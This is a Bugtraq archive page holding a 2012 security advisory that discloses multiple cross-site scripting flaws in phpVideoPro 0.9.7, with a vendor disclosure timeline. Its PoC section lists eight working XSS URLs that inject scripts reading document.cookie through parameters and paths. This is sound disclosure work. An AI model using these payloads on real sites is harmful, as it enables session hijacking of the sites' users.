Bugtraq mailing list archives

phpVideoPro Multiple XSS vulnerabilities


From: sschurtz () darksecurity de
Date: Sun, 15 Jan 2012 17:00:06 GMT

Advisory:               phpVideoPro Multiple XSS vulnerabilities
Advisory ID:            SSCHADV2011-041
Author:                 Stefan Schurtz
Affected Software:      Successfully tested on phpVideoPro 0.9.7
Vendor URL:             http://sourceforge.net/projects/phpvideopro/
Vendor Status:          fix in the latest development code

==========================
Vulnerability Description
==========================

phpVideoPro 0.9.7 is prone to multiple XSS vulnerabilities

==================
PoC-Exploit
==================

// XSS

http://[target]/phpvideopro-0.9.7/help/index.php?topic='";</script><script>alert(document.cookie)</script>
http://[target]/phpvideopro-0.9.7/login/";><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/configure.php/";><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/medialist.php/";><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/setfilter.php/";><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/search.php/";><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/listgen.php/";><script>alert(document.cookie)</script><"
http://[target]/phpvideopro-0.9.7/label.php/";><script>alert(document.cookie)</script><"

=========
Solution
=========

-

====================
Disclosure Timeline
====================

26-Dec-2011 - vendor informed
27-Dec-2011 - vendor feedback & fix in the latest development code

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/SSCHADV2011-041.tx


Current thread: